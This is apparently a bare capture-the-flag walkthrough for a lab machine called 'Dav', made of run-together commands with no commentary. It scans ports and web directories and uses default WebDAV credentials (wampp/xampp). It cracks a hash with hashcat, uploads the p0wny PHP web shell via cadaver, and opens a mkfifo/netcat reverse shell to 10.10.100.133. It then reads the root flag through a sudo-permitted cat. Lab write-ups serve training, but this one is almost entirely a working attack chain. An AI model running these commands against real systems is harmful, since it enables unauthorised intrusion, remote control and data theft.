Dav
Last updated
Last updated
nmap -sV -sT -O -p 1-65535 $VICTIMgobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txtUsername: wampp
Password: xampphashcat -m 1600 passwd.dav /usr/share/wordlists/rockyou.txtgit clone https://github.com/flozz/p0wny-shell.git
cp p0wny-shell/shell.php shell.phpcadaver http://$VICTIM:80/webdav
Username: wampp
Password: xampp
dav:/webdav/> put shell.php shell.phpnc -lvnp 1337rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.100.133 1337 >/tmp/fpython -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fgsudo -lLFILE=/root/root.txt
sudo cat "$LFILE"